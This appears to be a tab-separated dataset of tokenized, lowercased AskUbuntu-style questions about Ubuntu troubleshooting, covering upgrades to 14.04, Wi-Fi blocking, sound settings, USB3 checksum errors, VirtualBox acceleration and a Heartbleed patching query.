459427	connecting mybooklive nas	i 've connected my mybooklive directed using the ethernet cable to my machine running ubuntu 14.04 and when i do ifconfig i get the following response . eth0 link encap : ethernet hwaddr e8:11:32:6f:34 : de inet6 addr : fe80 : :ea11:32ff : fe6f:34de/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:963 errors:0 dropped:0 overruns:0 frame:0 tx packets:1343 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:108444 ( 108.4 kb ) tx bytes:273160 ( 273.1 kb ) i can not see the drive in my network connections . any idea which part of the above i would use for getting this connected ? thanks
459428	install 14.04 lts from 11.04	i have ubuntu 11.04 installed in my pc . now , the system does not allow me to update or upgrade anything . so , i would like to use one of your lts version . i prefer 14.04 , as it is new . i am having a dual booting pc with ubuntu 11.04 and windows-7 . i want to remove ubuntu 11.04 and in its place i would like to install 14.04 . so , kindly suggest me how can i proceed with installation .
459430	backlight button not working ( dell inspiron 14z ) - 14.04	the main point is that everything was working on 12.04 but now i can only change brightness using the applet . here 's what i have done so far : following the info provided on ubuntu wiki backlight i have landed on this page hotkey troubleshooting . the instructions suggest to kill gnome-settings-daemon but this daemon does n't look to be part of ubuntu anymore . i have run this command but nothing is shown when i press the backlight keys xev | sed -n 's/^ . *state \ ( [ 0-9 ] . *\ ) , keycode *\ ( [ 0-9 ] \+\ ) *\ ( . *\ ) , . * $ /keycode \2 = \3 , state = \1/p' so i have run sudo evtest and selected /dev/input/event5 : dell wmi hotkeys and got the following output : ( nothing happens if i press any of the following keys , except for the key_wlan , anyway only the backlight keys are not working on my system ) input driver version is 1.0.1 input device id : bus 0x19 vendor 0x0 product 0x0 version 0x0 input device name : `` dell wmi hotkeys '' supported events : event type 0 ( ev_syn ) event type 1 ( ev_key ) event code 148 ( key_prog1 ) event code 149 ( key_prog2 ) event code 161 ( key_ejectcd ) event code 224 ( key_brightnessdown ) event code 225 ( key_brightnessup ) event code 227 ( key_switchvideomode ) event code 236 ( key_battery ) event code 238 ( key_wlan ) event code 240 ( key_unknown ) event type 4 ( ev_msc ) event code 4 ( msc_scan ) properties : testing ... ( interrupt to exit ) it looks like i have 2 keys provided by dell_wmi module for backlight : event code 224 ( key_brightnessdown ) event code 225 ( key_brightnessup ) what should be the next step here ? in case it is filling a bug some where please tell me where and i will do it .
459431	not able to connect to openstack havana repo	i am trying to setup openstack ( havana ) compressed ha setup . for the setup we need ceph package . during the installation of package we are getting following error err : /stage [ main ] /cephdeploy/exec [ install ceph ] /returns : change from notrun to 0 failed : /usr/bin/ceph-deploy install -- no-adjust-repos controller-01 returned 1 instead of one of [ 0 ] at /usr/share/puppet/modules/cephdeploy/manifests/init.pp:143 i have tried to run the command manually but it is failing too . in this setup it is not able to connect to havana canonical repo . i donât know why apt is not able to read the packages from the ubuntu havana repo . apt-get -q update is also failing . has anyone faced similar kind of issue ?
459432	accessing windows system via netbios name from remove desktop viewer ?	i am using ubuntu 12.04 lts and windows 7 . i am access my windows pc via remotely ( remote desktop viewer ) rdp protocol . i am using ip address to access my windows pc but i do n't want to use ip addess i want to access my windows 7 via netbios name . how can i use netbios name instead ip address . plz help me .
459434	black screen at log in on ubuntu 14.04	i 'm trying to use ubuntu for the first time . i 'm working on an amd64 machine with an nvidia quadro fx3000 graphics card when i boot up the machine it passes bios checks and goes into ubuntu by flashing up the logo and then losing it . i 'm left with a black screen and my cursor shows up on screen still responsive . i can access the back end ok but im not sure what to do . can anyone help ? sometimes it comes up with an error saying can not reserve mmio .
459435	problem installing postgresql on ubuntu 12.04 lts error `` can not find proc/version	i 'm trying to install postgresql on my vps running ubuntu 12.04 . a month ago i success installed postgresql 9.3 but i forgot the postgis extension , after i installed the postgis there come a problem everytime i tried to restart the postgresql service . the error code is : can not find /proc/version - is /proc mounted ? error : pid file is invalid , please manually kill the stale server process please help me , i already tried any given tutorial and using several repo and ppa . i also clean format my server but the same error message always come . it came everytime i tried to sudo service restart postgresql regards update : here are my terminal respond from putty after `` ls /proc '' root @ hostname8327 : ~ # ls /proc 1 10437 4409 660 cpuinfo meminfo sysrq-trigger 103 10438 4410 685 devices modules sysvipc 10407 109 4411 7054 fairsched mounts uptime 10411 115 4412 7055 fairsched2 net user_beancounters 10412 2 444 7056 filesystems partitions version 10413 226 465 725 fs self vmstat 10414 3 498 729 kmsg stat vz 10425 395 500 cgroups loadavg swaps 10436 4407 6468 cmdline locks sys
459436	ubuntu 14.04 ralink rt 3290 wireless lan hard blocked	$ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no $ lspci | grep wireless 03:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie $ uname -a linux asus-x75vc 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux does anyone have any idea what 's wrong ? upd : $ sudo rfkill block wifi $ rfkill list 0 : phy0 : wireless lan soft blocked : yes hard blocked : no 1 : asus-wlan : wireless lan soft blocked : yes hard blocked : no $ sudo rfkill unblock wifi $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no
459438	how to uprade from 12.04 to 14.04 lts without internet connection ?	i just installed ubuntu 12.04 and want to update to ubuntu 14.04 lts but do not have an internet connection or another ubuntu pc . i do n't have an internet connection as the network modem drivers only works on windows and mac os x . can i just update it by putting it on usb and then onto the ubuntu pc ?
459439	unity no longer available after upgrade to 14.04	i just upgraded to 14.04 , i had no error messages but unity disappeared from the list of desktop environments in the log in screen . as you can see below , unity is installed . how can i log in back again with unity ? $ dpkg -l | grep unity ii gir1.2-unity-5.0 : amd64 7.1.4+14.04.20140210-0ubuntu1 amd64 gobject introspection data for the unity library ii gnome-themes-ubuntu 0.6.1 all ubuntu community themes ii libmeanwhile1 1.0.2-4.1ubuntu1 amd64 open implementation of the lotus sametime community client protocol ii libunity-2d-private0 7.2.0+14.04.20140423-0ubuntu1.2 all transitional dummy package rc libunity-action-qt1 : amd64 1.1.0+14.04.20140304-0ubuntu1 amd64 unity action qt api ii libunity-control-center1 14.04.3+14.04.20140410-0ubuntu1 amd64 utilities to configure the gnome desktop rc libunity-core-5.0-5 5.20.0-0ubuntu3 amd64 core library for the unity interface . ii libunity-core-6.0-9 7.2.0+14.04.20140423-0ubuntu1.2 amd64 core library for the unity interface ii libunity-gtk2-parser0 : amd64 0.0.0+14.04.20140403-0ubuntu1 amd64 gtkmenushell to gmenumodel parser ii libunity-gtk3-parser0 : amd64 0.0.0+14.04.20140403-0ubuntu1 amd64 gtkmenushell to gmenumodel parser ii libunity-misc4 4.0.5+14.04.20140115-0ubuntu1 amd64 miscellaneous functions for unity - shared library ii libunity-protocol-private0 : amd64 7.1.4+14.04.20140210-0ubuntu1 amd64 binding to get places into the launcher - private library ii libunity-scopes-json-def-desktop 7.1.4+14.04.20140210-0ubuntu1 all binding to get places into the launcher - desktop def file ii libunity9 : amd64 7.1.4+14.04.20140210-0ubuntu1 amd64 binding to get places into the launcher - shared library ii libunityvoice1 : amd64 0.1+14.04.20140304-0ubuntu1 amd64 client library for unity voice service ii unity 7.2.0+14.04.20140423-0ubuntu1.2 amd64 interface designed for efficiency of space and interaction . ii unity-2d 7.2.0+14.04.20140423-0ubuntu1.2 all transitional dummy package ii unity-2d-common 7.2.0+14.04.20140423-0ubuntu1.2 all transitional dummy package ii unity-2d-panel 7.2.0+14.04.20140423-0ubuntu1.2 all transitional dummy package ii unity-2d-shell 7.2.0+14.04.20140423-0ubuntu1.2 all transitional dummy package ii unity-2d-spread 7.2.0+14.04.20140423-0ubuntu1.2 all transitional dummy package ii unity-asset-pool 0.8.24daily13.06.10-0ubuntu1 all unity assets pool rc unity-common 5.20.0-0ubuntu3 all common files for the unity interface . ii unity-control-center 14.04.3+14.04.20140410-0ubuntu1 amd64 utilities to configure the gnome desktop ii unity-control-center-signon 0.1.7~+14.04.20140211.2-0ubuntu4 amd64 unity control center extension for single signon ii unity-greeter 14.04.9-0ubuntu1 amd64 unity greeter ii unity-gtk-module-common 0.0.0+14.04.20140403-0ubuntu1 all common files for gtkmenushell d-bus exporter ii unity-gtk2-module : amd64 0.0.0+14.04.20140403-0ubuntu1 amd64 gtkmenushell d-bus exporter ii unity-gtk3-module : amd64 0.0.0+14.04.20140403-0ubuntu1 amd64 gtkmenushell d-bus exporter ii unity-lens-applications 7.1.0+13.10.20131011-0ubuntu2 amd64 application lens for unity ii unity-lens-files 7.1.0+13.10.20130920-0ubuntu1 amd64 file lens for unity ii unity-lens-friends 0.1.3+14.04.20140317-0ubuntu1 amd64 friends scope for unity ii unity-lens-music 6.9.0+13.10.20131011-0ubuntu1 amd64 music lens for unity ii unity-lens-photos 1.0+14.04.20140318-0ubuntu1 all photos lens for unity ii unity-lens-video 0.3.15+13.10.20130920-0ubuntu1 amd64 unity video lens ii unity-scope-audacious 0.1+13.10.20130927.1-0ubuntu1 all audacious scope for unity ii unity-scope-calculator 0.1+14.04.20140328-0ubuntu1 all calculator scope for unity ii unity-scope-chromiumbookmarks 0.1+13.10.20130723-0ubuntu1 all chromium bookmarks scope for unity ii unity-scope-clementine 0.1+13.10.20130723-0ubuntu1 all clementine scope for unity ii unity-scope-colourlovers 0.1+13.10.20130723-0ubuntu1 all colourlovers scope for unity ii unity-scope-devhelp 0.1+14.04.20140328-0ubuntu1 all devhelp scope for unity ii unity-scope-firefoxbookmarks 0.1+13.10.20130809.1-0ubuntu1 all firefox bookmarks scope for unity ii unity-scope-gdrive 0.9+13.10.20130723-0ubuntu1 all google drive scope for unity ii unity-scope-gmusicbrowser 0.1+13.10.20130723-0ubuntu1 all gmusicbrowser scope for unity ii unity-scope-gourmet 0.1+13.10.20130723-0ubuntu1 all gourmet recipe manager scope for unity ii unity-scope-guayadeque 0.1+13.10.20130927.1-0ubuntu1 all guayadeque scope for unity ii unity-scope-home 6.8.2+14.04.20131029.1-0ubuntu1 amd64 home scope that aggregates results from multiple scopes ii unity-scope-manpages 3.0+14.04.20140324-0ubuntu1 all manual pages scope for unity ii unity-scope-musicstores 6.9.0+13.10.20131011-0ubuntu1 amd64 ubuntu one music store scope for unity ii unity-scope-musique 0.1+13.10.20130723-0ubuntu1 all musique scope for unity ii unity-scope-openclipart 0.1+13.10.20130723-0ubuntu1 all openclipart scope for unity ii unity-scope-texdoc 0.1+14.04.20140328-0ubuntu1 all texdoc scope for unity ii unity-scope-tomboy 0.1+13.10.20130723-0ubuntu1 all tomboy scope for unity ii unity-scope-video-remote 0.3.15+13.10.20130920-0ubuntu1 amd64 remote videos engine ii unity-scope-virtualbox 0.1+13.10.20130723-0ubuntu1 all virtualbox scope for unity ii unity-scope-yelp 0.1+13.10.20130723-0ubuntu1 all help scope for unity ii unity-scope-zotero 0.1+13.10.20130723-0ubuntu1 all zotero scope for unity ii unity-scopes-master-default 6.8.2+14.04.20131029.1-0ubuntu1 all home scope that aggregates results from multiple scopes ii unity-scopes-runner 7.1.4+14.04.20140210-0ubuntu1 all desktop runner for misceallenous scopes ii unity-services 7.2.0+14.04.20140423-0ubuntu1.2 amd64 services for the unity interface ii unity-settings-daemon 14.04.0+14.04.20140414-0ubuntu1 amd64 daemon handling the unity session settings ii unity-voice-service : amd64 0.1+14.04.20140304-0ubuntu1 amd64 voice recognition service for unity ii xubuntu-community-wallpapers 14.04.0 all xubuntu community wallpapers
459442	how to install the latest chromium-browser on old ubuntu releases ?	i 've encountered a user who alleges that 25.0.1364.160 is the latest version , so i guess that she is still using ubuntu lucid ( 10.04 ) , because chromium-browser is up-to-date in later releases . to get a recent version , i tried to add the 14.04 lts repository , and pinned chromium-browser : sudo add-apt-repository `` deb http : //archive.ubuntu.com/ubuntu trusty universe '' cat < < heredoc | sudo tee /etc/apt/preferences.d/chromium-browser-pin-400 package : * pin : release n=trusty pin-priority : 400 package : chromium-browser chromium-browser-l10n chromium-codecs-ffmpeg chromium-codecs-ffmpeg-extra pin : release n=trusty pin-priority : 500 heredoc sudo apt-get update sudo apt-get upgrade i do n't have lucid at hand , so i tested the previous in a 11.10 live cd that i still had lingering around . unfortunately , installation failed because of unmet dependencies . before diving even deeper into resolving unmet dependencies , i want to know whether this way of getting the latest chromium-browser is viable . if not : what is the recommended way of installing the latest stable version of chromium on an old ubuntu version ?
459447	ubuntu 14.04 is very slow to respond while handbrake is encoding	i 've upgraded my ubuntu 12.04 install to 14.04 using a fresh install . i have handbrake installed using it 's nightly ppa . and ever since i 've been running it on 14.04 , while using it to encode video files , the entire computer becomes unresponsive and very slow . i checked in the system monitor and handbrake 's instance has a `` normal '' priority , and even if i change it to `` very low '' priority , the system is still extremely slow . do you have any suggestions ? thanks .
459450	forward slash ( / ) is not working after upgraded to 14.04	i 'm using lenovo g580 , and i have recently upgraded to 14.04 from 13.10 , after this upgrade forward slash ( / ) is not working and long press of backspace is also not working . thank you in advance .
459453	how to take screenshot of the current video frame in skype ?	i want to take a screenshot of only the video part that i am looking at and not the whole screen . it is possible in the windows version of skype , where we can just click the `` take a picture '' button and we get the current video frame ( picture ) in our gallery . i 've tried it on ubuntu , but there seems to be no option for it . how to take screenshot of the current video frame in skype on ubuntu 14.04 ?
459455	ubuntu 14.04 along windows 8 - do you recommend ?	i am having a problem with installing 13.04 on my samsung , would you recommend to try installing 14.04 along windows 8 ?
459456	after failed upgrade 13.10 to 14.04 multiple errors and no dock + cant apt-get	after a failed upgrade from 13.10 to 14.04 i can boot to the login screen , but after login i am greeted with 20+ 'system problem detected ' which i can report , but this report fails . to go with this , there is no dock etc . i 've googled around and tried a few fixes but get stuck i think because i cant apt-get is also broken . i am not too experienced with ubuntu , the only time i really play around with it is when something goes wrong .
459458	ubuntu desktop 64 bit hangs on booting	ok , so i finally managed to install a 64-bit version of ubuntu 14.04 desktop version . no problems with the installation . now when i boot into ubuntu , it takes me to the desktop screen and after about one or two seconds , it just hangs . i can not move the mouse cursor , i can not do nothing expect force restart the pc . does anyone know how to fix this ? ? my system specs : ram : 2 gb hdd : 500 gb processor : amd athlon ii x2 250 ( dual core processor ) p.s . : i was using windows 8 before ; and had no problems with it .
459460	ubuntu server internet connection	im using windows 8 with usb internet connection . i have installed ubuntu server using virtual box . in virtualbox network setting i tried all types of connections . still ubuntu server is not getting connected to internet . if i type ping google.com it gives me unknown host looks like ubuntu server in virtual box will not detect usb internet connection . how do i configure ubuntu server in virtualbox to detect my usb internet connection ?
459461	remove kde and switch to cli	i installed ubuntu server 14.04 on my server this morning , i thought it would be cool to run a gui . though it occupies too much memory for my liking . how can i revert back to cli , permanently ? and also how can i remove kde so it never existed ? i 've tried sudo apt-get remove kubuntu-desktop & & sudo apt-get remove autoclean but it 's still there .
459463	busybox : dropping to build-in shell : initramfs problem with encrypted hard drive	i tried to do an upgrade from 13.10 to 14.04 on my laptop . when i came back a bit later , the machine had crashed . i restarted it and it had got in a pickle halfway through the upgrade process . i did all the recommended stuff like sudo apt-get install -f and sudo dpkg -- configure -a . at some point when executing all of these remedial commands the machine lost the ability to reboot . i have an encrypted hard drive and instead of prompting me for the password , i was getting an evms_activate is not available error message . i tried to follow the commands here but i 'm not sure i did them right as i have a separate boot partition . now when i boot it gives up waiting for my root device and drops into an initramfs shell with the message alert ! /dev/mapper/w530-root does not exist . when i check `/proc/cmdline ' as recommended i see that it looks like boot_image=/vmlinuz-3.11.0-20-generic root=/dev/mapper/w530-root ro quiet splash and when i look do ls /dev/mapper i just see the control file . i really do n't know what i 've misconfigured and any help would be appreciated as i just seem to be getting my machine in a worse and worse state . i 've looked at some of the other questions with similar symptoms on askubuntu and they do n't seem to help .
459466	can not change wifi settings , stuck on wep security	i just started using linux and as such do not have a proper knowledge of how to use the command line and all of those sorts of things , so please try to bear with me : ) . i have been able to connect to my house wifi since i first started using this computer , but for some reason after a restart , i could no longer connect to wifi as when i am asked for a password i can only enter one which is either 5 or 14 characters long . i looked up a number of guides on the subject , this seeming to fit the description perfectly : wifi only accepts passwords of 5 or 13 characters i have tried since then changing my wireless setting for my network back to wpa , which it allows me to do . however when i try to connect to the internet , it gets stuck in the same place , and if i try to view it under my wireless connections , my computer will for some reason have created a new log of this network . by this i mean , i will have changed the settings to wpa on `` my-wifi '' , and when it tries to connect it will create a new wep connection called `` my-wifi 1 '' . tried a few fixes but none have worked : / .
459472	ubuntu under virtualbox in windows 7 - how to set bigger screen resolution ?	i have a windows 7 with virtualbox . i did install a fresh downloaded ubuntu 14 ( 64bit ) . i did install the guest additions . i wanted to set the screen resolution to a higher value than 640x480 . i did go over on/off ( top right ) -- system settings -- hardware -- viewing devices . i get only `` eingebaute anzeige '' ( german , wnglish would probably be `` builtin display '' ) and only one screen resolution . i have found a howto for ubuntu 9 and did try to edit/create an /etc/x11/xorg.conf . but this too did n't work . has anybody a hint please ? thanks in advance and regards , thomas
459474	java file will not launch from .desktop file - ubuntu 12.04 lts	i have a bin/bash script- # ! /bin/bash java -xms256m -xmx1g -jar keeperdesktop.jar inside an executable text file ( keeper-start ) i have created a .desktop file for it as i want to launch it from unity launcher [ desktop entry ] name=keeper type=application exec=java -xms256m -xmx1g -jar keeperdesktop.jar terminal=false icon=/home/dt/keeper/keeper.jpg comment=keepersecurity datavault nodisplay=false categories=applications name [ en ] =keeper.desktop i have the icon in the launcher but the app wo n't start this is the limit of my knowledge that i have gleaned from other answers on this site , i am hoping someone can help me finish this process thanks david
459479	sound settings not saved	here is a video of what is happening . every time i set my input to `` rear microphone '' it goes back to `` digital input ( s/pdif ) '' ( just by closing the window , not even restarting or logging out ) . this happens only for the input tab , for the output works fine . if i run pactl list sources here is what i get with the window open : source # 13 state : running name : alsa_input.pci-0000_00_1b.0.analog-stereo description : built-in audio analog stereo driver : module-alsa-card.c sample specification : s16le 2ch 44100hz channel map : front-left , front-right owner module : 6 mute : no volume : 0 : 98 % 1 : 98 % 0 : -0,61 db 1 : -0,61 db balance 0,00 base volume : 10 % -60,00 db monitor of sink : n/a latency : 2693 usec , configured 20000 usec flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc888 analog '' alsa.id = `` alc888 analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel mid '' alsa.long_card_name = `` hda intel mid at 0xfbff8000 irq 46 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 3b56 '' device.product.name = `` 5 series/3400 series chipset high definition audio '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` built-in audio analog stereo '' alsa.mixer_name = `` realtek alc888 '' alsa.components = `` hda:10ec0888,1458a002,00100001 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-input-microphone-front : front microphone ( priority : 8500 , not available ) analog-input-microphone-rear : rear microphone ( priority : 8200 , available ) analog-input-linein : line in ( priority : 8100 , available ) active port : analog-input-microphone-rear formats : pcm and here it is what i get after i close the window : source # 8 state : running name : alsa_input.pci-0000_00_1b.0.iec958-stereo description : built-in audio digital stereo ( iec958 ) driver : module-alsa-card.c sample specification : s16le 2ch 44100hz channel map : front-left , front-right owner module : 6 mute : no volume : 0 : 40 % 1 : 40 % 0 : -23,88 db 1 : -23,88 db balance 0,00 base volume : 100 % 0,00 db monitor of sink : n/a latency : 0 usec , configured 36000 usec flags : hardware decibel_volume latency properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc888 digital '' alsa.id = `` alc888 digital '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 1 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel mid '' alsa.long_card_name = `` hda intel mid at 0xfbff8000 irq 46 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 3b56 '' device.product.name = `` 5 series/3400 series chipset high definition audio '' device.form_factor = `` internal '' device.string = `` iec958:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` iec958-stereo '' device.profile.description = `` digital stereo ( iec958 ) '' device.description = `` built-in audio digital stereo ( iec958 ) '' alsa.mixer_name = `` realtek alc888 '' alsa.components = `` hda:10ec0888,1458a002,00100001 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : iec958-stereo-input : digital input ( s/pdif ) ( priority : 0 ) active port : iec958-stereo-input formats : pcm i was having problems with audio so i ran these commands and i probably messed up something : sudo apt-get install alsa-tools-gui sudo apt-get remove pulseaudio sudo apt-get remove pulseaudio-utils sudo apt-get remove pavucontrol sudo apt-get install pulseaudio sudo apt-get install pulseaudio-utils here the sound indicator and some of system settings were gone so i had to : sudo apt-get install indicator-sound sudo apt-get install unity-control-center
459484	why am i not being able to import dateutil module in python 3 ?	i 'm trying to use the python 3 version of matplotlib module . i am getting errors about dateutil not being present even though i have installed this package . should n't import dateutil work after installing the above package ? i am using ubuntu 14.04 in case it matters .
459487	ubuntu 14.04 lts and heartbleed bug	does ubuntu 14.04 lts on it 's own , the desktop version and not the server version , contain any heartbleed bug vulnerabilities ? i need to install this on a business laptop and i do n't want to open up any heartbleed vulnerabilities to the company . if there are vulnerabilities , how can i patch them before i connect the laptop to the internet after i 've installed the 14.04 from the dvd iso ?
459489	same external drive and file , different md5sum when connected via usb3 vs usb2	i have an external usb3 hdd with an ext4 partition on it . i 've been plagued with file corruption issues for days whilst trying to transfer a large ( ~200gb ) file from the drive , and i 've finally isolated the issue : ubuntu does n't seem to be reading from the drive properly when it 's connected to a usb3 port . when i connect it to a usb2 port ( i.e . making use of the backwards compatibility ) , it works fine . when computing an md5sum of the file , i get a different output depending on the usb port the drive is connected to . when connected via usb2 , the correct checksum is outputted . however , when reading via usb3 , an incorrect checksum is reported . in fact , i get a different checksum each time when connected via usb3 . is there anything i can do about this ? for now , i 'll just carry on using the drive as a usb2 drive . i paid extra for usb3 especially though so it 'd be nice to get it working ! lsusb ( full , the drive is block 2 device 8 samsung ) : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 005 device 002 : id 0424:2514 standard microsystems corp. usb 2.0 hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 003 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 002 device 004 : id 04d9:2013 holtek semiconductor , inc . keyboard [ das keyboard ] bus 002 device 005 : id 1532:0016 razer usa , ltd bus 002 device 006 : id 1a40:0101 terminus technology inc. 4-port hub bus 002 device 008 : id 04e8:61b6 samsung electronics co. , ltd bus 002 device 007 : id 046d:081b logitech , inc. webcam c310 fdisk -l ( trimmed ) : disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x77a41a5d device boot start end blocks id system /dev/sdc1 2048 1953523711 976760832 83 linux
459491	method other than top to discover running services	i have a pretty old laptop running 11.10 . as of late the fan is constantly going flat out and it is driving me nuts . usually it will do this when i have few things open in chrome , cause chrome is always up to something . i have rebooted and just let the machine idle and after a few minutes again it fires up the fan and runs hot . clean out exhaust fans etc but still no joy . is there another method to find out if something else is taking up processor time ? init─┬─networkmanager─┬─dhclient │ └─2* [ { networkmanager } ] ├─vboxsvc─┬─virtualbox───21* [ { virtualbox } ] │ └─8* [ { vboxsvc } ] ├─vboxxpcomipcd ├─virtualbox───4* [ { virtualbox } ] ├─accounts-daemon─── { accounts-daemo } ├─acpid ├─atd ├─avahi-daemon───avahi-daemon ├─bluetoothd ├─chrome─┬─chrome │ ├─chrome-sandbox───chrome─┬─chrome─┬─10* [ chrome───3* [ { chrome } ] ] │ │ │ └─chrome───5* [ { chrome } ] │ │ └─nacl_helper_boo │ └─74* [ { chrome } ] ├─colord───2* [ { colord } ] ├─console-kit-dae───64* [ { console-kit-da } ] ├─couchdb───couchdb───beam─┬─heart │ └─4* [ { beam } ] ├─cron ├─cupsd ├─2* [ dbus-daemon ] ├─dbus-launch ├─dconf-service───2* [ { dconf-service } ] ├─desktopcouch-se───2* [ desktopcouch-se ] ├─gconfd-2 ├─6* [ getty ] ├─gnome-keyring-d───5* [ { gnome-keyring- } ] ├─gnome-screensav───2* [ { gnome-screensa } ] ├─gnome-terminal─┬─bash───pstree │ ├─gnome-pty-helpe │ └─3* [ { gnome-terminal } ] ├─gsd-printer─── { gsd-printer } ├─gvfs-afc-volume─── { gvfs-afc-volum } ├─gvfs-fuse-daemo───3* [ { gvfs-fuse-daem } ] ├─gvfs-gdu-volume ├─gvfs-gphoto2-vo ├─gvfsd ├─gvfsd-burn ├─gvfsd-computer ├─gvfsd-metadata ├─gvfsd-trash ├─lightdm─┬─xorg │ ├─gnome-session─┬─applet.py │ │ ├─bluetooth-apple─── { bluetooth-appl } │ │ ├─chrome───10* [ { chrome } ] │ │ ├─deja-dup-monito───2* [ { deja-dup-monit } ] │ │ ├─gdu-notificatio │ │ ├─gnome-fallback-───2* [ { gnome-fallback } ] │ │ ├─gnome-panel───2* [ { gnome-panel } ] │ │ ├─gnome-settings-─┬─syndaemon │ │ │ └─3* [ { gnome-settings } ] │ │ ├─gnome-sound-app─── { gnome-sound-ap } │ │ ├─metacity │ │ ├─nautilus───3* [ { nautilus } ] │ │ ├─nm-applet─── { nm-applet } │ │ ├─polkit-gnome-au─── { polkit-gnome-a } │ │ ├─ssh-agent │ │ ├─telepathy-indic─── { telepathy-indi } │ │ ├─update-notifier───2* [ { update-notifie } ] │ │ ├─zeitgeist-datah─── { zeitgeist-data } │ │ └─3* [ { gnome-session } ] │ └─2* [ { lightdm } ] ├─mission-control ├─modem-manager ├─mysqld───11* [ { mysqld } ] ├─nmbd ├─notify-osd───2* [ { notify-osd } ] ├─polkitd─── { polkitd } ├─pulseaudio─┬─gconf-helper │ └─2* [ { pulseaudio } ] ├─rsyslogd───3* [ { rsyslogd } ] ├─rtkit-daemon───2* [ { rtkit-daemon } ] ├─samba───9* [ samba ] ├─smbd───smbd ├─ubuntuone-syncd───3* [ { ubuntuone-sync } ] ├─udevd───2* [ udevd ] ├─udisks-daemon─┬─udisks-daemon │ └─2* [ { udisks-daemon } ] ├─upowerd───2* [ { upowerd } ] ├─upstart-socket- ├─upstart-udev-br ├─vmware-authdlau ├─vmware-usbarbit ├─vmware-vmblock-───2* [ { vmware-vmblock } ] ├─wpa_supplicant └─zeitgeist-daemo─┬─cat └─ { zeitgeist-daem }
459493	virtualbox+fglrx=no hardware acceleration in guest	i am trying to enable 3d hardware acceleration for my windows xp guest on my ubuntu 14.04 host . 2d acceleration works on any driver . my system specs are : graphics : amd radeon hd 6450 motherboard : intel d915gev processor : intel pentium 4 3.0ghz when i have fglrx installed and active , virtualbox says that my hardware is not compatible . but when i have xserver-xorg-video-radeon driver active , 3d acceleration works . fglrx : /usr/lib/virtualbox/vboxtestogl -- test 3d -- log /dev/stdout vboxtestgl 4.3.10_ubuntu r93012 linux.x86 ( apr 7 2014 03:30:39 ) release log 00:00:00.000183 log opened 2014-05-02t12:08:24.479284000z 00:00:00.000257 os product : linux 00:00:00.000286 os release : 3.13.0-24-generic 00:00:00.000315 os version : # 46-ubuntu smp thu apr 10 19:08:14 utc 2014 00:00:00.000345 executable : /usr/lib/virtualbox/vboxtestogl 00:00:00.000350 process id : 4641 00:00:00.000353 package type : linux_32bits_generic ( ose ) 00:00:00.000425 testing 3d support : 00:00:00.009034 opengl info : render spu : opening display :0 00:00:00.127054 opengl info : render spu : opening display :0 here it freezes ( but program is running at 100 % cpu ) radeon : /usr/lib/virtualbox/vboxtestogl -- test 3d -- log /dev/stdout vboxtestgl 4.3.10_ubuntu r93012 linux.x86 ( apr 7 2014 03:30:39 ) release log 00:00:00.000183 log opened 2014-05-02t12:08:24.479284000z 00:00:00.000257 os product : linux 00:00:00.000286 os release : 3.13.0-24-generic 00:00:00.000315 os version : # 46-ubuntu smp thu apr 10 19:08:14 utc 2014 00:00:00.000345 executable : /usr/lib/virtualbox/vboxtestogl 00:00:00.000350 process id : 4641 00:00:00.000353 package type : linux_32bits_generic ( ose ) 00:00:00.000425 testing 3d support : 00:00:00.009034 opengl info : render spu : opening display :0 00:00:00.127054 opengl info : render spu : opening display :0 00:00:00.177493 opengl info : render spu : gl_vendor : x.org 